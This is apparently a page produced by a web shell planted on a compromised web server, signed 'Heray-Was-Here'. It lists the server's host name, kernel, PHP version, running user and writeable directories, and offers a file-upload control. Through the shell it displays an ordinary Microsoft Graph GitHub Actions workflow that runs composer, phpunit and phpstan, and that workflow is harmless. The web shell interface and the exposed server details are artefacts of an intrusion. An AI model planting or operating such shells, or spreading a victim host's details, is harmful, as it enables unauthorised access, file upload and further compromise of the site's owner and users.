Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/dev/htdocs/includes/microsoft/microsoft-graph/.github/workflows/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/dev/htdocs/includes/microsoft/microsoft-graph/.github/workflows/pr-validation.yml
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.

name: "Validate Pull Request"

on:
  push:
    branches: [ main, dev ]
  pull_request:
    branches: [ main, dev ]
    # Add assigned to defaults as a hack to easily trigger code-gen PRs to run validation
    types: [assigned, opened, synchronize, reopened]

defaults:
  run:
    shell: bash

jobs:
  validate-pull-request:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v2.3.4
    - name: Validate composer file
      run: |
        composer validate
    - name: Install dependencies
      run: |
        composer install
    - name: run tests
      run : |
        vendor/bin/phpunit --exclude-group functional
  run-static-analysis:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v2.3.4
    - name: Validate composer file
      run: |
        composer validate
    - name: Install dependencies
      run: |
        composer install
    - name: Run static analysis
      run: |
          vendor/bin/phpstan analyse --memory-limit=1500M --error-format=github

Hry